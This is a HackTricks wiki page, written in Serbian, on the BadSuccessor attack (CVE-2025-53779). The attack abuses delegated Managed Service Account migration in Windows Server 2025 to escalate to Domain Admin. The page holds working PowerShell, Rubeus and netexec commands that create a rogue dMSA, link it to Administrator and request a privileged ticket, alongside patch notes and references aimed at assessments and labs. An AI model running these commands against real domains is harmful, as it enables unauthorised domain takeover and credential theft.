BadSuccessor
Tip
Nauči i vežbaj AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).
Podrži HackTricks
- Pogledaj pretplatničke planove!
- Pridruži se 💬 Discord grupi, telegram grupi, prati @hacktricks_live na X/Twitter, ili pogledaj LinkedIn stranicu i YouTube kanal.
- Deli hacking trikove slanjem PR-ova u HackTricks i HackTricks Cloud github repozitorijume.
Pregled
BadSuccessor zloupotrebljava tok migracije delegated Managed Service Account (dMSA) uveden u Windows Server 2025. dMSA može biti povezan sa legacy nalogom preko msDS-ManagedAccountPrecededByLink i premeštan kroz stanja migracije čuvana u msDS-DelegatedMSAState. Ako napadač može da kreira dMSA u writable OU i kontroliše te atribute, KDC može izdati tikete za dMSA kojim upravlja napadač sa authorization context povezanog naloga.
U praksi to znači da korisnik sa niskim privilegijama, koji ima samo delegated OU prava, može da kreira novi dMSA, usmeri ga na Administrator, dovrši stanje migracije, i zatim dobije TGT čiji PAC sadrži privilegovane grupe kao što su Domain Admins.
dMSA detalji migracije koji su bitni
- dMSA je funkcija Windows Server 2025.
Start-ADServiceAccountMigrationpostavlja migraciju u stanje started.Complete-ADServiceAccountMigrationpostavlja migraciju u stanje completed.msDS-DelegatedMSAState = 1znači da je migracija pokrenuta.msDS-DelegatedMSAState = 2znači da je migracija završena.- Tokom legitimne migracije, dMSA je namenjen da transparentno zameni nadmašeni nalog, tako da KDC/LSA zadržavaju pristup koji je prethodni nalog već imao.
Microsoft Learn takođe napominje da je tokom migracije originalni nalog vezan za dMSA i da je namera da dMSA pristupa onome čemu je stari nalog mogao da pristupi. To je bezbednosna pretpostavka koju BadSuccessor zloupotrebljava.
Zahtevi
- Domen gde dMSA exists, što znači da je podrška za Windows Server 2025 prisutna na AD strani.
- Napadač može da kreira
msDS-DelegatedManagedServiceAccountobjekte u nekom OU, ili ima ekvivalentna široka prava za kreiranje child objekata tamo. - Napadač može da piše relevantne dMSA atribute ili u potpunosti kontroliše dMSA koji je upravo kreirao.
- Napadač može da zahteva Kerberos tikete iz domain-joined konteksta ili iz tunela koji ima pristup LDAP/Kerberos.
Praktične provere
Najčistiji operator signal je da se verifikuje nivo domena/foresta i potvrdi da okruženje već koristi novi Server 2025 stack:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Ako vidite vrednosti kao što su Windows2025Domain i Windows2025Forest, tretirajte BadSuccessor / dMSA migration abuse kao proveru visokog prioriteta.
Takođe možete enumerisati writable OU-ove delegirane za dMSA kreiranje pomoću javno dostupnih alata:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Tok zloupotrebe
- Kreiraj dMSA u OU gde imaš delegirana create-child prava.
- Postavi
msDS-ManagedAccountPrecededByLinkna DN privilegovanog targeta kao što jeCN=Administrator,CN=Users,DC=corp,DC=local. - Postavi
msDS-DelegatedMSAStatena2da označiš da je migracija završena. - Zatraži TGT za novi dMSA i koristi vraćeni ticket za pristup privilegovanim servisima.
PowerShell primer:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Primeri zahteva za ticket / operativni alati:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Zašto je ovo više od privilege escalation
Tokom legitimne migracije, Windows takođe mora da omogući novom dMSA da obrađuje tikete koji su izdati za prethodni nalog pre cutover-a. Zbog toga dMSA-related ticket material može da uključuje current i previous ključeve u KERB-DMSA-KEY-PACKAGE flow.
Za fake migraciju pod kontrolom napadača, to ponašanje može da pretvori BadSuccessor u:
- Privilege escalation nasleđivanjem privilegovanih group SID-ova u PAC-u.
- Credential material exposure zato što rukovanje previous-key može da otkrije materijal ekvivalentan RC4/NT hash-u prethodnika u ranjivim workflow-ovima.
To čini tehniku korisnom i za direktno preuzimanje domena i za naknadne operacije kao što su pass-the-hash ili širi credential compromise.
Napomene o patch statusu
Originalno BadSuccessor ponašanje nije samo teorijsko 2025 preview pitanje. Microsoft je dodelio CVE-2025-53779 i objavio security update u August 2025. Zadržite ovaj napad dokumentovan za:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- validation of OU delegations and dMSA exposure during assessments
Nemojte pretpostavljati da je Windows Server 2025 domen ranjiv samo zato što postoji dMSA; proverite patch level i testirajte pažljivo.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Nauči i vežbaj AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).
Podrži HackTricks
- Pogledaj pretplatničke planove!
- Pridruži se 💬 Discord grupi, telegram grupi, prati @hacktricks_live na X/Twitter, ili pogledaj LinkedIn stranicu i YouTube kanal.
- Deli hacking trikove slanjem PR-ova u HackTricks i HackTricks Cloud github repozitorijume.


